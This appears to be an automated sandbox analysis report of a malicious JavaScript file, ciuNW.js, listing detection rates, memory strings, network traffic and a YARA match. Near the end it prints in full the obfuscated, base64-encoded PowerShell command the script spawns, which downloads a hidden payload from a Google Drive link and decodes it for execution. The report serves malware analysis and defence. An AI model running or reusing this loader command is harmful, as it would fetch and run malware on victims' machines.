Source: ciuNW.js |
ReversingLabs: Detection: 15% |
Source: ciuNW.js |
Virustotal: Detection: 33% |
Perma Link |
Source: unknown |
HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:49730 version: TLS 1.2 |
Source: |
Binary string: e.pdb source: powershell.exe, 00000003.00000002.1752173846.00000224E5A45000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ystem.pdb source: powershell.exe, 00000003.00000002.1747930129.00000224E5790000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ystem.pdbpdbtem.pdb source: powershell.exe, 00000003.00000002.1747930129.00000224E5790000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: mscorlib.pdb source: powershell.exe, 00000003.00000002.1751823933.00000224E585F000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbdp source: powershell.exe, 00000003.00000002.1752173846.00000224E5A7B000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: n.pdb source: powershell.exe, 00000003.00000002.1752173846.00000224E5A45000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: lib.pdbpdblib.pdb source: powershell.exe, 00000003.00000002.1752173846.00000224E5A7B000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000003.00000002.1730317481.00000224CB84C000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: n.pdbo source: powershell.exe, 00000003.00000002.1751823933.00000224E5877000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbL source: powershell.exe, 00000003.00000002.1751823933.00000224E5877000.00000004.00000020.00020000.00000000.sdmp |
Source: ciuNW.js |
Argument value : ['"powershell -command $Codigo = \'SQBFAFgAKAAgACgAKAAnAFQAMgBIAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABaADQAUwBo'] |
Go to definition |
Source: ciuNW.js |
Return value : ['"$Codigo = \'SQBFAFgAKAAgACgAKAAnAFQAMgBIAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABaADQAUwBoAHQAdABwAHMAOgAvAC8A', '"powershell -command $Codigo = \'SQBFAFgAKAAgACgAKAAnAFQAMgBIAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABaADQAUwBo'] |
Go to definition |
Source: ciuNW.js |
Return value : ['"$Codigo = \'SQBFAFgAKAAgACgAKAAnAFQAMgBIAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABaADQAUwBoAHQAdABwAHMAOgAvAC8A', '"powershell -command $Codigo = \'SQBFAFgAKAAgACgAKAAnAFQAMgBIAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABaADQAUwBo'] |
Go to definition |
Source: ciuNW.js |
Return value : ['"$Codigo = \'SQBFAFgAKAAgACgAKAAnAFQAMgBIAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABaADQAUwBoAHQAdABwAHMAOgAvAC8A', '"powershell -command $Codigo = \'SQBFAFgAKAAgACgAKAAnAFQAMgBIAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABaADQAUwBo'] |
Go to definition |
Source: ciuNW.js |
Argument value : ['"WScript.Shell"', '"$Codigo = \'SQBFAFgAKAAgACgAKAAnAFQAMgBIAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABaADQAUwBoAHQAdABwAHMAOgAvAC8A', '"powershell -command $Codigo = \'SQBFAFgAKAAgACgAKAAnAFQAMgBIAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABaADQAUwBo'] |
Go to definition |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive |
Source: Joe Sandbox View |
JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
DNS traffic detected: DNS query: drive.google.com |
Source: global traffic |
DNS traffic detected: DNS query: drive.usercontent.google.com |
Source: powershell.exe, 00000003.00000002.1730754402.00000224CED36000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000003.00000002.1730754402.00000224CED75000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000003.00000002.1744490743.00000224DD6F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1744490743.00000224DD838000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000003.00000002.1730754402.00000224CD8AE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000001.00000002.1760303672.00000179569FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1730754402.00000224CD681000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000003.00000002.1730754402.00000224CD8AE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000001.00000002.1760303672.000001795697D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6 |
Source: powershell.exe, 00000001.00000002.1760303672.00000179569CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1730754402.00000224CD681000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000003.00000002.1744490743.00000224DD838000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000003.00000002.1744490743.00000224DD838000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000003.00000002.1744490743.00000224DD838000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000003.00000002.1730754402.00000224CED30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1730754402.00000224CECAE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000001.00000002.1760303672.0000017956EE1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=dow |
Source: powershell.exe, 00000003.00000002.1730283475.00000224CB7C0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvU |
Source: powershell.exe, 00000003.00000002.1730754402.00000224CD8AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1730754402.00000224CECAE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur |
Source: powershell.exe, 00000003.00000002.1730754402.00000224CECAE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwurX |
Source: powershell.exe, 00000003.00000002.1752051836.00000224E58F0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1aivgjjjv1f6vs4suoybnh-sdvu |
Source: powershell.exe, 00000003.00000002.1730754402.00000224CED5B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000003.00000002.1730754402.00000224CED5B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download |
Source: powershell.exe, 00000003.00000002.1730754402.00000224CD8AE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000002.1730754402.00000224CE2AE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.1744490743.00000224DD6F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1744490743.00000224DD838000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49730 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49730 -> 443 |
Source: unknown |
HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:49730 version: TLS 1.2 |
Source: Process Memory Space: powershell.exe PID: 7632, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SQBFAFgAKAAgACgAKAAnAFQAMgBIAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABaADQAUwBoAHQAdABwAHMAOgAvAC8AZAByAGkAdgBlAC4AZwBvAG8AZwBsAGUALgBjAG8AbQAvAHUAYwA/AGUAeABwAG8AcgB0AD0AZABvAHcAbgBsAG8AYQBkACYAaQBkAD0AMQBBAEkAVgBnAEoASgBKAHYAMQBGADYAdgBTADQAcwBVAE8AeQBiAG4ASAAtAHMARAB2AFUAJwArACcAaABCAFkAdwB1AHIAIABaADQAUwA7AFQAMgBIAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgACcAKwAnAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQAnACsAJwBuAHQAOwBUADIASABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAFQAMgAnACsAJwBIAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKABUADIASABpAG0AYQBnAGUAVQByAGwAKQA7AFQAMgBIAGkAbQBhACcAKwAnAGcAZQBUAGUAeAAnACsAJwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAJwArACcAcgBpAG4AZwAoAFQAMgBIAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7AFQAMgBIAHMAdABhAHIAdABGAGwAYQBnACAAPQAgAFoANABTADwAPABCAEEAUwBFADYANABfAFMAJwArACcAVABBAFIAVAA+AD4AWgA0AFMAOwAnACsAJwBUADIASABlAG4AZABGAGwAYQBnACAAPQAgAFoANABTADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgBaACcAKwAnADQAJwArACcAUwA7AFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAVAAyAEgAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAVAAyAEgAcwB0AGEAcgB0AEYAbABhAGcAKQA7AFQAMgBIAGUAbgBkAEkAbgBkACcAKwAnAGUAeAAgAD0AIABUADIASABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkACcAKwAnAGUAeABPAGYAKABUADIASABlAG4AZABGAGwAYQBnACkAOwBUADIASABzAHQAYQByAHQASQBuAGQAZQB4ACAALQAnACsAJwBnAGUAIAAwACAALQBhAG4AZAAgAFQAMgBIAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAVAAyAEgAcwB0AGEAcgB0AEkAbgBkACcAKwAnAGUAeAA7AFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAnACsAJwBUADIASABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAVAAyAEgAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACcAKwAnACAAVAAyAEgAZQBuAGQASQBuAGQAZQB4ACAALQAgAFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAOwBUADIASABiAGEAcwAnACsAJwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgAFQAMgBIAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKABUADIASABzAHQAYQByAHQASQBuAGQAZQB4ACwAIABUADIASABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAVAAyAEgAYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAVAAyAEgAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuACcAKwAnAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIABWAEcAcQAgAEYAbwAnACsAJwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABUADIASABfACAAfQApAFsALQAnACsAJwAxACcAKwAnAC4ALgAtACgAVAAyAEgAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAEwAZQBuAGcAdABoACkAXQA7AFQAMgBIAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsA |